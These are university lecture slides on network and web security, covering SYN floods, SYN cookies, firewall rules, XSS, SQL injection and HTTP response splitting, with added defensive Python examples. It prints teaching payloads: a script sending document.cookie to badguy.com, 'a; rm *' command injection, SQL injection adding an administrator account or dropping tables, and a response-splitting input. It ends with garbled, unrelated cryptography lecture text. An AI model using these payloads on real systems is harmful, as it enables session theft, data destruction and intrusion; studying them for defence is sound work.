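    Does a legitimate SYN arriving at client_at seconds fail to get a slot?
    Keeping size entries alive for timeout seconds needs only size/timeout
    SYNs per second, i.e. one every 3 s for the slide's numbers."""
    q = HalfOpenQueue(size, timeout)
    t, n = 0.0, 0
    while t < client_at:
        q.on_syn(t, "203.0.113.%d" % (n % 250), 1024 + n)   # forged source, never completes
        n += 1
        t += 1.0 / rate_per_sec
    return not q.on_syn(client_at, "198.51.100.7", 40000)


# --- SYN cookies: put the state into the ISN instead of into a queue -------
KEY = b"constructed-server-secret-rotate-me"   # assumption: a per-server secret


def cookie_isn(src_ip: str, src_port: int, dst_port: int, client_seq: int, minute: int) -> int:
    """ISN = HMAC(key, 4-tuple, client ISN, current minute) truncated to 32 bits.
    Nothing is stored when the SYN+ACK is sent."""
    msg = "%s|%d|%d|%d|%d" % (src_ip, src_port, dst_port, client_seq, minute)
    return struct.unpack("!I", hmac.new(KEY, msg.encode(), hashlib.sha256).digest()[:4])[0]


def accept_ack(src_ip: str, src_port: int, dst_port: int, client_seq: int,
               ack_num: int, now_minute: int) -> bool:
    """On the final ACK recompute the cookie for this minute and the previous
    one; the handshake is genuine iff ack_num == cookie + 1. A flood of SYNs
    costs the server nothing, and forged ACKs fail without a valid cookie."""
    for m in (now_minute, now_minute - 1):
        expected = (cookie_isn(src_ip, src_port, dst_port, client_seq, m) + 1) & 0xFFFFFFFF
        if hmac.compare_digest(struct.pack("!I", expected), struct.pack("!I", ack_num & 0xFFFFFFFF)):
            return True
    return False


if __name__ == "__main__":
    print("1 SYN/s blocks clients:  ", syn_flood_blocks_client(1.0))
    print("0.1 SYN/s blocks clients:", syn_flood_blocks_client(0.1))
    isn = cookie_isn("198.51.100.7", 40000, 80, 1000, 5)
    print("valid ACK accepted: ", accept_ack("198.51.100.7", 40000, 80, 1000, isn + 1, 5))
    print("forged ACK accepted:", accept_ack("198.51.100.7", 40000, 80, 1000, 12345, 5))
```

The model makes the slide's arithmetic visible: one spoofed SYN per second, with the source address forged so no RST ever clears a slot, is three times what is needed to keep a 20-entry, 60-second queue permanently full. The cookie variant trades the queue for a per-minute HMAC; real implementations pack the cookie into fewer bits and lose TCP options, which is why kernels enable it only under load.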
Distributed Denial of Service
  - Coordinate multiple subverted machines to attack; flood a server with bogus requests. TCP SYN packet flood: > 600,000 packets per second.
  - Detection and assessment: 12,800 attacks at 5,000 hosts in a 3-week period during 2001; IP spoofing (forged source IP address). http://www.cs.ucsd.edu/users/savage/papers/UsenixSec01.pdf
  - Feb 6, 2007: 6 of 13 root servers suffered a DDoS attack. Oct 21, 2002: 9 of 13 root servers were swamped; this prompted changes in the architecture.
  - Prevention: filtering; decentralized file storage.

Kinds of Firewalls
  - Personal firewalls: run at the end hosts (e.g. Norton, Windows, etc.). Benefit: more application- and user-specific information is available.
  - Filter based: operates by filtering on packet headers.
  - Proxy based: operates at the level of the application (e.g. an HTTP web proxy).

Filtering Firewalls
  - Filtering can take advantage of the following information from the network and transport layer headers: source, destination, source port, destination port, flags (e.g. ACK), protocol type (e.g. UDP vs. TCP).
  - Some firewalls keep state about open TCP connections. This allows conditional filtering rules of the form: if an internal machine has established the TCP connection, permit inbound reply packets.

Example pf rules from the openbsd.org website (the pf.conf sample; these lines are reconstructed from a garbled extraction):
  tcp_services = "{ 22, 113 }"
  icmp_types = "echoreq"
  comp3 = "192.168.0.3"
  # options
  set block-policy return
  set loginterface $ext_if
  set skip on lo
  # scrub
  scrub in
  # nat/rdr
  nat on $ext_if from !($ext_if) -> ($ext_if:0)
  nat-anchor "ftp-proxy/*"
  rdr-anchor "ftp-proxy/*"
  rdr pass on $int_if proto tcp to port ftp -> 127.0.0.1 port 8021
  rdr on $ext_if proto tcp from any to any port 80 -> $comp3
  # filter rules
  block in
  pass out keep state
  anchor "ftp-proxy/*"
  antispoof quick for { lo $int_if }
  pass in on $ext_if inet proto tcp from any to ($ext_if) port $tcp_services flags S/SA keep state
  pass in on $ext_if inet proto tcp from any to $comp3 port 80 flags S/SA synproxy state
  pass in inet proto icmp all icmp-type $icmp_types keep state
  pass in quick on $int_if

Filter Example
  Action | our host | port | their host | port | comment
  block  | *        | *    | BAD        | *    | untrusted host
  allow  | GW       | 25   | *          | *    | allow our SMTP port
  - Apply the rules
    from top to bottom, with an assumed default entry:
  Action | our host | port | their host | port | comment
  block  | *        | *    | *          | *    | default
  - A bad entry, intended to allow connections to SMTP from inside:
  Action | our host | port | their host | port | comment
  allow  | *        | *    | *          | 25   | connect to their SMTP
  - This allows all connections to or from port 25, but an outside machine can run anything on its port 25.

Filter Example (continued)
  - Permit outgoing calls to port 25:
  Action | src        | port | dest | port | flags | comment
  allow  | 123.45.6.* | *    | *    | 25   |       | their SMTP
  allow  | *          | 25   | *    | *    | ACK   | their replies
  - This filter doesn't protect against IP address spoofing: the bad hosts can pretend to be one of the hosts with addresses 123.45.6.*.

When to Filter
  - (Figure: a router with packet filtering possible at its input and at its output; the firewall sits between the internal network and the outside.)

On Input or Output?
  - Filtering on output can be more efficient, since it can be combined with the table lookup of the route.
  - However, some information is lost at the output stage, e.g. the physical input port on which the packet arrived, which can be useful for preventing address spoofing.
  - Filtering on input can protect the router itself.

Principles for Firewall Configuration
  - General principle: filter as early as possible.
  - Least privilege: turn off everything that is unnecessary (e.g. web servers should disable SMTP, port 25).
  - Fail-safe defaults: by default, reject. Note that this can cause usability problems.
  - Egress filtering: filter outgoing packets too. You know the valid IP addresses for machines internal to the network, so drop packets whose source address isn't valid. This can help prevent DoS attacks in the Internet.

Example real firewall config script (FreeBSD ipfw; the slide shows only the first rules):
  #########
  # FreeBSD Firewall configuration.
  # Single-machine custom firewall setup.  Protects somewhat
  # against the outside world.
  #########
  # Set this to your ip address.
  ip="192.100.66.1"
  setup_loopback
  # Allow anything outbound from this address.
  ${fwcmd} add allow all from ${ip} to any out
  # Deny anything outbound from other addresses.
  ${fwcmd} add deny log all from any to any out
  # Allow inbound ftp, ssh, email, tcp-dns, http, https, imap, imaps, pop3, pop3s
  ${fwcmd} add allow tcp from any to ${ip} 21 setup
  ${fwcmd} add allow tcp from any to ${ip} 22 setup
  ${fwcmd} add allow tcp from any to ${ip} 25 setup
  ${fwcmd} add allow tcp from any to ${ip} 53 setup
  ${fwcmd} add allow tcp from any to ${ip} 80 setup
  ${fwcmd} add allow tcp from any to ${ip} 443 setup
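The filter tables above evaluated by a first-match packet filter, to make the two pitfalls concrete: the over-broad "port 25" entry that lets an outsider who sources traffic from port 25 reach any inside port, and the fact that rules keyed on source address do nothing against a spoofed address unless the interface the packet arrived on is checked (the egress/ingress filtering principle). This is an added example, not from the lecture; only the inside network 123.45.6.* comes from the slide, while the stand-ins for BAD and GW, the other addresses and the packets are constructed.

```python
# Added example, not from the lecture slides: a first-match packet filter over
# the rule tables above. Rules are matched on the (src, sport, dst, dport,
# flags) of each packet; the slide's "our host / their host" columns are
# rendered as directional src/dst rules. Addresses, hosts and packets are
# constructed; only the inside network 123.45.6.* comes from the slide.
from ipaddress import ip_address, ip_network

INSIDE = "123.45.6.0/24"                      # the slide's 123.45.6.* network
GW, BAD = "123.45.6.1", "198.51.100.66"       # constructed stand-ins for GW and BAD


def matches(pattern, value) -> bool:
    """'*' matches anything; a CIDR pattern matches addresses inside it."""
    if pattern == "*":
        return True
    if isinstance(value, str) and "/" in str(pattern):
        return ip_address(value) in ip_network(pattern)
    return pattern == value


def rule(action, src, sport, dst, dport, flags=(), comment=""):
    return {"action": action, "src": src, "sport": sport, "dst": dst,
            "dport": dport, "flags": set(flags), "comment": comment}


def pkt(iface, src, sport, dst, dport, *flags):
    """iface is where the packet arrived: 'ext' (outside) or 'int' (inside)."""
    return {"iface": iface, "src": src, "sport": sport, "dst": dst,
            "dport": dport, "flags": set(flags)}


def filter_packet(rules, p, default="block", check_iface=True) -> str:
    """Ingress/egress check first (slide: drop packets whose source address
    cannot be valid for the interface they arrived on), then the rules in
    order; the first match wins; `default` applies if none matches."""
    src_is_inside = ip_address(p["src"]) in ip_network(INSIDE)
    if check_iface and ((p["iface"] == "ext" and src_is_inside)
                        or (p["iface"] == "int" and not src_is_inside)):
        return "block (spoofed address)"
    for r in rules:
        if (matches(r["src"], p["src"]) and matches(r["sport"], p["sport"])
                and matches(r["dst"], p["dst"]) and matches(r["dport"], p["dport"])
                and r["flags"] <= p["flags"]):
            return r["action"]
    return default


# The slide's first table plus its mistaken "connect to their SMTP" entry,
# which matches port 25 in either direction.
FAULTY = [
    rule("block", BAD, "*", "*", "*", comment="untrusted host"),
    rule("allow", "*", "*", GW, 25, comment="allow our SMTP port"),
    rule("allow", "*", "*", "*", 25, comment="to their SMTP"),
    rule("allow", "*", 25, "*", "*", comment="from their port 25: too broad"),
]

# The corrected table from the continuation slide: outgoing calls to port 25
# only from inside, and replies from port 25 only with ACK set (never a SYN).
FIXED = [
    rule("block", BAD, "*", "*", "*", comment="untrusted host"),
    rule("allow", "*", "*", GW, 25, comment="allow our SMTP port"),
    rule("allow", INSIDE, "*", "*", 25, comment="their SMTP"),
    rule("allow", "*", 25, "*", "*", flags={"ACK"}, comment="their replies"),
]

OUTBOUND_SMTP = pkt("int", "123.45.6.9", 40000, "192.0.2.10", 25, "SYN")
SMTP_REPLY = pkt("ext", "192.0.2.10", 25, "123.45.6.9", 40000, "SYN", "ACK")
PORT25_ATTACK = pkt("ext", "203.0.113.5", 25, "123.45.6.9", 23, "SYN")      # outsider sources from 25
SPOOFED = pkt("ext", "123.45.6.9", 40000, "123.45.6.20", 25, "SYN")          # outsider claims an inside address

if __name__ == "__main__":
    for name, p in [("outbound SMTP", OUTBOUND_SMTP), ("SMTP reply", SMTP_REPLY),
                    ("telnet from port 25", PORT25_ATTACK), ("spoofed inside source", SPOOFED)]:
        print("%-22s faulty: %-8s fixed: %s" % (name, filter_packet(FAULTY, p), filter_packet(FIXED, p)))
    print("spoofed packet without the interface check:", filter_packet(FIXED, SPOOFED, check_iface=False))
```

The ACK-flag rule is the stateless ancestor of the "keep state" rule in the pf example: both let replies in without letting an outsider open a connection. Neither helps against the spoofed packet, which only the interface check catches.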
Proxy-Based Firewalls
  - (Figure: an internal host opens a TCP/HTTP connection to the proxy in the firewall, which opens its own connection to the local web server or to the outside.)
  - The proxy acts like both a client and a server, so it can filter using application-level information: for example, permit some URLs to be visible outside and prevent others from being visible.
  - Proxies can provide other services too: caching, load balancing, etc.
  - FTP and Telnet proxies are common too.

CIS 551 / TCOM 401, Computer and Network Security, Spring 2009, Lecture 24 (4/23/09)

Announcements
  - Plan for today: web security, part I.
  - Project 4 is due 28 April 2009 at 11:59 pm.
  - Final exam: Friday May 8, 2009, 9:00am - 11:00am, Moore 216.
  - Please complete the online course evaluations: http://www.upenn.edu/eval

Web Security
  - Review: HTTP, scripting.
  - Risks from incoming executable code: JavaScript, ActiveX, plugins, Java.
  - Next time: controlling outgoing information; cookies and the cookie mechanism.

HyperText Transfer Protocol
  - Used to request and return data. Methods: GET, POST, PUT, HEAD, DELETE.
  - Stateless request/response protocol: each request is independent of previous requests. Statelessness has a significant impact on the design and implementation of applications.
  - Evolution: HTTP 1.0 was simple; HTTP 1.1 is more complex (it added persistent connections).

HTTP Request
  Method, file and HTTP version, then headers, a blank line, then data (none for GET):
  GET /default.asp HTTP/1.0
  Accept: image/gif, image/x-bitmap, image/jpeg, */*
  Accept-Language: en
  User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
  Connection: Keep-Alive
  If-Modified-Since: Sunday, 20-Apr-08 04:32:58 GMT
  (blank line)

HTTP Response
  HTTP version, status code and reason phrase, then headers, then data:
  HTTP/1.0 200 OK
  Date: Sun, 20 Apr 2008 02:20:42 GMT
  Server: Microsoft-Internet-Information-Server/5.0
  Connection: keep-alive
  Content-Type:
    text/html
  Last-Modified: Thu, 17 Apr 2008 17:39:05 GMT
  Content-Length: 2543
  (blank line)
  <HTML> Some data... blah, blah, blah </HTML>

HTTP Server Status Codes
  Code | Description
  200  | OK
  201  | Created
  301  | Moved Permanently
  302  | Moved Temporarily
  400  | Bad Request (not understood)
  401  | Unauthorized
  403  | Forbidden (not authorized)
  404  | Not Found
  500  | Internal Server Error
  - Return code 401 is used to indicate HTTP authorization; HTTP authorization has serious problems.

HTML and Scripting
  - The browser receives the content, displays the HTML and executes the scripts.
  <html>
  <P>
  <script>
    var num1, num2, sum;
    num1 = prompt("Enter first number");
    num2 = prompt("Enter second number");
    sum = parseInt(num1) + parseInt(num2);
    alert("Sum = " + sum);
  </script>
  </html>

Events
  - A mouse event causes a page-defined function to be called.
  <script type="text/javascript">
    function whichButton(event) {
      if (event.button == 1) {
        alert("You clicked the left mouse button");
      } else {
        alert("You clicked the right mouse button");
      }
    }
  </script>
  ...
  <body onmousedown="whichButton(event)">
  ...
  </body>
  - Other events: onLoad, onMouseMove, onKeyPress, onUnLoad.

Document Object Model (DOM)
  - Object-oriented interface used to read and write documents: a web page in HTML is structured data, and the DOM provides a representation of this hierarchy.
  - Examples: properties document.alinkColor, document.URL, document.forms[], document.links[], document.anchors[]; methods document.write(), document.referrer.
  - Also the Browser Object Model (BOM): Window, Document, Frames[], History, Location, Navigator (type and version of browser).

Browser Security Risks
  - Compromise the host: write to the file system; interfere with other processes in the browser environment.
  - Steal information: read the file system; read information associated with other browser processes (e.g. other windows).
  - Fool the user.
  - Reveal information through traffic analysis.

OWASP.org Top 10 (2007), Open Web Application Security Project
  1. Cross-site scripting (XSS)
  2. Injection flaws
  3. Malicious file execution
  4. Insecure direct object reference
  5. Cross-site request forgery
  6. Information leakage and improper error handling
  7. Broken authentication and session management
  8. Insecure cryptographic storage
  9. Insecure communications
  10. Failure to restrict URL access

Browser Sandboxing
  - Idea: code executed in the browser has only restricted access to the OS, the network and browser data structures.
  - Isolation: conceptually similar to OS process isolation; the browser is a weak OS.
  - Same Origin Principle: only the site that stores some information in the browser may later read or modify that information (or depend on it in any way).
  - Details: what is a site (URL, domain, pages from the same site)? What is information (cookies, document object, cache)? By default only users can set other policies. There is no way to keep sites from sharing information.

Schematic Web Site Architecture
  - (Figure: firewall, application firewall (WAF), load balancer, IDS, application servers and database; authorization products such as Netegrity (CA) and Oblix (Oracle).)

Web App Code
  - Runs on the web server or app server. Takes input from web users via the web server; interacts with the database and 3rd parties; prepares results for users via the web server.
  - Examples: shopping carts, home banking, bill pay, tax prep, ...
  - New code is written for every web site, in C, PHP, Perl, Python, JSP, ASP, ..., often with little consideration for security.

Common Vulnerabilities (OWASP)
  - Inadequate validation of user input: cross-site scripting, SQL injection, HTTP splitting.
  - Broken session management: can lead to session hijacking and data theft.
  - Insecure storage: sensitive data stored in the clear is a prime target for theft (e.g. Egghead, Verizon). Note the PCI Data Security Standard (Visa, Mastercard).

Warm Up: A Simple Example
  - Direct use of user input: http://victim.com/copy.php?name=username
  - copy.php includes: system("cp temp.dat $name.dat")
  - Problem: http://victim.com/copy.php?name="a; rm *" (properly URL-encoded, e.g. name=a%3B%20rm%20*)
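The copy.php flaw above in Python, beside a version that never hands the parameter to a shell. This is an added example, not from the lecture; the file names, the temporary directory and its contents are constructed, and the vulnerable command string is built but deliberately not executed.

```python
# Added example, not from the lecture slides: the copy.php flaw in Python,
# beside a version that never hands the parameter to a shell. File names,
# the temporary directory and the contents written are constructed; the
# vulnerable command string is built but deliberately not executed.
import os
import re
import shlex
import shutil
import subprocess
import tempfile


def build_shell_command(name: str) -> str:
    """What copy.php does: system("cp temp.dat $name.dat")."""
    return "cp temp.dat %s.dat" % name


def commands_in(cmd: str) -> list:
    """Naive view of how the shell splits on ';' (enough to show the injection;
    a real shell also honours |, &&, $(...) and backticks)."""
    return [part.strip() for part in cmd.split(";")]


def quoted_shell_command(name: str) -> str:
    """Second best: quote the value so the shell treats it as one word."""
    return "cp temp.dat %s.dat" % shlex.quote(name)


def split_like_shell(cmd: str) -> list:
    return shlex.split(cmd)


SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def is_safe_name(name: str) -> bool:
    """Allow-list: letters, digits, '_' and '-' only; no separators, no '/'."""
    return SAFE_NAME.match(name) is not None


CP = shutil.which("cp")


def safe_copy(name: str, workdir: str) -> str:
    """Best: validate against the allow-list, then run the program with an
    argv list, so there is no shell to interpret ';', '*' or spaces."""
    if not is_safe_name(name):
        raise ValueError("rejected file name: %r" % name)
    src = os.path.join(workdir, "temp.dat")
    dst = os.path.join(workdir, name + ".dat")
    if CP:
        subprocess.run([CP, "--", src, dst], check=True)   # '--' ends option parsing
    else:
        shutil.copyfile(src, dst)   # portability fallback where no cp binary exists
    return dst


def demo_safe_copy() -> bool:
    """Copy succeeds for a valid name and the injection string is refused."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "temp.dat"), "wb") as f:
            f.write(b"payload")
        with open(safe_copy("report1", d), "rb") as f:
            copied = f.read() == b"payload"
        try:
            safe_copy("a; rm *", d)
            return False
        except ValueError:
            return copied


if __name__ == "__main__":
    injected = build_shell_command("a; rm *")
    print("shell would run:", commands_in(injected))
    print("quoted version splits to:", split_like_shell(quoted_shell_command("a; rm *")))
    print("allow-list + argv works:", demo_safe_copy())
```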
Redirects
  - EZShopper.com shopping cart: http://.../cgi-bin/loadpage.cgi?page=url redirects the browser to url.
  - Redirects are common on many sites: used to track when a user clicks on an external link; some sites use redirects to add HTTP headers.
  - Problem: phishing. http://victim.com/cgi-bin/loadpage?page=phisher.com: a link to victim.com puts the user at phisher.com.
  - Local redirects should ensure the target URL is local.

Cross-Site Scripting
  - The setup: user input is echoed into the HTML response. Example: a search field, http://victim.com/search.php?term=apple. search.php responds with
      <HTML> <BODY> <TITLE> Search Results </TITLE>
      Results for <?php echo $_GET['term'] ?> :
      </BODY> </HTML>
  - Is this exploitable?

Bad Input
  - Problem: no validation of the input term. Consider the link (properly URL-encoded)
      http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
  - What if the user clicks on this link?
      1. The browser goes to victim.com/search.php.
      2. victim.com returns <HTML> Results for <script> ... </script> ...
      3. The browser executes the script and sends badguy.com the cookie for victim.com.

So What?
  - Why would a user click on such a link? A phishing email in a webmail client (e.g. gmail); a link in a DoubleClick banner ad; many, many ways to fool a user into clicking.
  - What if badguy.com gets the cookie for victim.com? The cookie can include the session authentication for victim.com, or other data intended only for victim.com. This violates the same origin policy.

URIs Are Complicated
  - Uniform Resource Identifier (URI), aka URL. URI is an extensible format: URI = scheme ":" hier-part [ "?" query ] [ "#" fragment ]
  - Examples: ftp://ftp.foo.com/dir/file.txt; http://www.cis.upenn.edu; ldap://[2001:db8::7]/c=GB?objectClass?one; tel:+1-215-898-2661; http://www.google.com/search?client=safari&rls=en&q=foo&ie=UTF-8&oe=UTF-8

URIs (continued)
  - Confusion: try going to www.whitehouse.org or www.whitehouse.com instead of www.whitehouse.gov; www.foo.com vs. a look-alike spelling of it.
  - Obfuscation: use IP addresses rather than host names, e.g. http://192.34.56.78; use Unicode-escaped characters rather than readable text, e.g.
    (the slide's example URL is garbled in this copy: http susie69532684f54net).

Even Worse
  - The attacker can execute arbitrary scripts in the browser and can manipulate any DOM component on victim.com: control links on the page; control form fields (e.g. the password field) on this page and linked pages.
  - Can infect other users: the MySpace.com worm.

MySpace.com (Samy worm)
  - Users can post HTML on their pages. MySpace.com ensures the HTML contains no <script>, <body>, onclick, <a href=javascript://>
  - ... but JavaScript can be placed within CSS tags: <div style="background:url('javascript:alert(1)')">, and javascript can be hidden as java\nscript.
  - With careful JavaScript hacking, Samy's worm infects anyone who visits an infected MySpace page and adds Samy as a friend. Samy had millions of friends within 24 hours.
  - More info: http://namb.la/popular/tech.html

Avoiding XSS Bugs (PHP)
  - Main problem: input checking is difficult; there are many ways to inject scripts into HTML.
  - Preprocess input from the user before echoing it. PHP htmlspecialchars(string):
      &  ->  &amp;     "  ->  &quot;     '  ->  &#039;     <  ->  &lt;     >  ->  &gt;
  - htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES) outputs: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;

Avoiding XSS Bugs (ASP.NET)
  - Active Server Pages (ASP): Microsoft's server-side script engine.
  - ASP.NET Server.HtmlEncode(string): similar to PHP htmlspecialchars.
  - validateRequest is on by default: it crashes the page if it finds <script> in POST data, looking for a hard-coded list of patterns. It can be disabled: <%@ Page validateRequest="false" %>

SQL Injection
  - The setup: user input is used in a SQL query. Example login page (ASP):
      set ok = execute("SELECT * FROM UserTable WHERE username='" & form("user") & "' AND password='" & form("pwd") & "'");
      if not ok.EOF
          login success
      else fail;
  - Is this exploitable?

Of Course (xkcd.com)
  - "Hi, this is your son's school. We're having some computer trouble."  "Oh dear, did he break something?"  "In a way. Did you really name your son Robert'); DROP TABLE Students;-- ?"  "Oh, yes. Little Bobby Tables, we call him."  "Well, we've lost this year's student records. I hope you're happy."  "And I hope you've learned to sanitize your database inputs."
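The search.php page above as a small template, rendered without and with output encoding (the Python equivalent of htmlspecialchars with ENT_QUOTES), plus the href context where encoding alone is not enough and the URL scheme has to be checked, which is the kind of place the Samy worm exploited. This is an added example, not from the lecture; the victim and attacker host names are those of the slides, and the payload and test inputs are constructed.

```python
# Added example, not from the lecture slides: the search.php page as a small
# template rendered with and without output encoding, plus the href context
# where encoding alone is not enough. Host names follow the slides; the
# payload and test inputs are constructed.
import html
from urllib.parse import parse_qs, urlencode, urlparse

PAYLOAD = '<script>window.open("http://badguy.com/?cookie="+document.cookie)</script>'
PAGE = "<HTML><BODY><TITLE>Search Results</TITLE>Results for %s :</BODY></HTML>"


def term_from_url(url: str) -> str:
    """The decoded ?term= parameter, as the server sees it."""
    return parse_qs(urlparse(url).query).get("term", [""])[0]


def attack_url() -> str:
    """The slide's link, properly URL-encoded."""
    return "http://victim.com/search.php?" + urlencode({"term": PAYLOAD})


def render_unsafe(term: str) -> str:
    """<?php echo $_GET['term'] ?> : the input is copied straight into the page."""
    return PAGE % term


def encode_html(s: str) -> str:
    """Same mapping as htmlspecialchars($s, ENT_QUOTES): & < > " and '."""
    return html.escape(s, quote=True).replace("&#x27;", "&#039;")


def render_safe(term: str) -> str:
    return PAGE % encode_html(term)


def contains_script(page: str) -> bool:
    return "<script" in page.lower()


def link_allowed(user_url: str) -> bool:
    """Only http(s) may go into an href. HTML encoding does not stop
    javascript: URLs, and the Samy worm hid the scheme as java\\nscript;
    the check runs on the parsed scheme, so that trick fails too."""
    return urlparse(user_url).scheme in ("http", "https")


def safe_link(user_url: str) -> str:
    """Scheme check for the URL context, then encoding for the HTML context."""
    if not link_allowed(user_url):
        raise ValueError("refusing non-http URL in href: %r" % user_url)
    return '<a href="%s">link</a>' % encode_html(user_url)


if __name__ == "__main__":
    term = term_from_url(attack_url())
    print("unsafe page runs script: ", contains_script(render_unsafe(term)))
    print("encoded page runs script:", contains_script(render_safe(term)))
    print(encode_html("<a href='test'>Test</a>"))
    print("javascript: link allowed:", link_allowed("javascript:alert(1)"))
```

The point of the last two functions is that encoding is per context: what makes a string safe as HTML text (encode_html) does not make it safe as a URL, a style value or a JavaScript literal, and each of those needs its own rule.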
Bad Input
  - Suppose user = ' or 1=1 -- (URL-encoded). Then the script does:
      ok = execute("SELECT ... WHERE username='' or 1=1 -- ... ")
  - The -- causes the rest of the line to be ignored. Now ok.EOF is always false.
  - The bad news: easy login to many sites this way.

Even Worse
  - Suppose user = '; exec cmdshell 'net user badguy badpwd' / ADD --
  - Then the script does: ok = execute("SELECT ... WHERE username=''; exec ... ")
  - If the SQL server context runs as "sa" (system administrator), the attacker gets an account on the DB server.
  - Or, as in the xkcd comic: user = Robert'); DROP TABLE Students;--

Avoiding SQL Injection
  - Build SQL queries by properly escaping arguments: ' -> \'
  - Example: parameterized SQL (ASP.NET) ensures SQL arguments are properly escaped.
      SqlCommand cmd = new SqlCommand("SELECT * FROM UserTable WHERE username = @User AND password = @Pwd", dbConnection);
      cmd.Parameters.Add("@User", Request["user"]);
      cmd.Parameters.Add("@Pwd", Request["pwd"]);
      cmd.ExecuteReader();

HTTP Response Splitting
  - The setup: user input is echoed in an HTTP header. Example: a language redirect page (JSP):
      <% response.redirect("/by_lang.jsp?lang=" + request.getParameter("lang")) %>
  - The browser sends http://.../by_lang.jsp?lang=french, and the server's HTTP response is
      HTTP/1.1 302 (redirect)
      Date: ...
      Location: /by_lang.jsp?lang=french
  - Is this exploitable?

Bad Input
  - Suppose the browser sends (URL-encoded) http://.../by_lang.jsp?lang=french \r\n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK ... spoofed page ...
  - The HTTP response from the server then looks like:
      HTTP/1.1 302 (redirect)
      Date: ...
      Location: /by_lang.jsp?lang=french
      Content-length: 0

      HTTP/1.1 200 OK
      Content-length: 217
      ... spoofed page ...

So What?
  - What just happened? The attacker submitted a bad URL to victim.com; the URL contained a spoofed page in it; the attacker got back the spoofed page.
  - So what? Cache servers along the path now store the spoof of victim.com, which will fool any user using the same cache server.
  - Defense: don't do that (never echo unvalidated input into a header).
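The login query above run against an in-memory SQLite table, first by string concatenation as in the ASP code and then parameterized, followed by the header check that stops the response-splitting input. This is an added example, not from the lecture; the table, the credentials and the payloads are constructed. SQLite's -- comment syntax matches the slide's bypass, but its execute() refuses stacked statements, so the DROP TABLE variant is not reproduced here.

```python
# Added example, not from the lecture slides: the login query run against an
# in-memory SQLite table by string concatenation and then parameterized, plus
# the header check against the response-splitting input. Table contents,
# credentials and payloads are constructed.
import sqlite3
from urllib.parse import quote


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    db.execute("INSERT INTO UserTable VALUES ('alice', 'correct horse')")
    return db


def login_concat(db, user: str, pwd: str) -> bool:
    """The ASP code: the query text is assembled from the form fields."""
    sql = "SELECT * FROM UserTable WHERE username='%s' AND password='%s'" % (user, pwd)
    return db.execute(sql).fetchone() is not None      # 'not ok.EOF'


def login_param(db, user: str, pwd: str) -> bool:
    """Parameterized: the driver sends the values separately from the query
    text, so a quote in the input can never change the statement."""
    row = db.execute("SELECT * FROM UserTable WHERE username=? AND password=?",
                     (user, pwd)).fetchone()
    return row is not None


INJECTION = "' or 1=1 --"       # the slide's bad input; '--' comments out the rest


def splitting_blocked(value: str) -> bool:
    """True if the value would be refused as a header value: any control
    character (CR, LF, ...) could end the header and start a second response."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def redirect_location(lang: str) -> str:
    """What the JSP should have done: refuse control characters and URL-encode
    the value before embedding it in the Location header."""
    if splitting_blocked(lang):
        raise ValueError("control character in header value")
    return "Location: /by_lang.jsp?lang=" + quote(lang, safe="")


SPLIT_PAYLOAD = ("french\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\n"
                 "Content-Length: 17\r\n\r\n<p>spoofed page</p>")

if __name__ == "__main__":
    db = make_db()
    print("concat, injected user:", login_concat(db, INJECTION, "anything"))
    print("param,  injected user:", login_param(db, INJECTION, "anything"))
    print("param,  real user:    ", login_param(db, "alice", "correct horse"))
    print("splitting payload refused:", splitting_blocked(SPLIT_PAYLOAD))
    print(redirect_location("french"))
```

Parameterization is the fix, not escaping: the escaping rule on the slide (' -> \') is only right for one database's string syntax, while a bound parameter never enters the parser at all.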
Computer and Network Security Spring 2009 Lecture 12 Announcements Plan for Today Introduction to Cryptography Project 2 reminder Due Friday 1159 pm Project 3 will be up soon 3909 CISTCOM 551 Kpu rroyporcpior Cryptography From the Greek quotkryptosquot and quotgraphiaquot for secret writing Confidentiality Obscure a message from eavesdroppers Integrity Assure recipient that the message was not altered Authentication Verify the identity of the source of a message Nonrepudiation Convince a 3rd party that what was said is accurate 3909 CISTCOM 551 3 Terminology encr tion dec tion Plaintext yp Ciphertext ryp Plaintext Cryptographer Invents cryptosystems Cryptanalyst Breaks cryptosystems Cryptology Study of crypto systems Cipher Mechanical way of encrypting text or data Code Semantic translation eat breakfast tomorrow attack on Thursday or use Navajo Key a parameter of the Cipher algorithm 3909 CISTCOM 551 4 Kinds of Cryptographic Analysis Goal is to recover the key amp algorithm And hence recover the plaintext Ciphertext Only attacks No information about content or algorithm Very hard Algorithm amp Ciphertext attacks Known algorithm known ciphertext recover key Common in practice Known Plaintext attacks Full or partial plaintext available in addition to ciphertext Chosen Plaintext attacks Attacker can choose which plaintext is encrypted tries to reverse engineer the key May be able to choose multiple plaintexts 3909 CISTCOM 551 The Caesar Cipher Purportedly used by Julius Caesar c 75 BC Add 3 mod 26 Advantages Simple Intended to be performed in the field Most people couldn t read anyway Disadvantages Violates no security through obscurity Easy to break why 04 9 CD O39 h O QJ gtlt O39lt 39lt Olt N 3909 CISTCOM 551 Monoalphabetic Ciphers Also called substitution ciphers Separate algorithm from the key Add N mod 26 rot13 Add 13 mod 26 General monoalphabetic cipher Arbitrary permutation n of the alphabet Key is the permutation 3909 CISTCOM 551 Example Cipher abcdefghijkl 7 
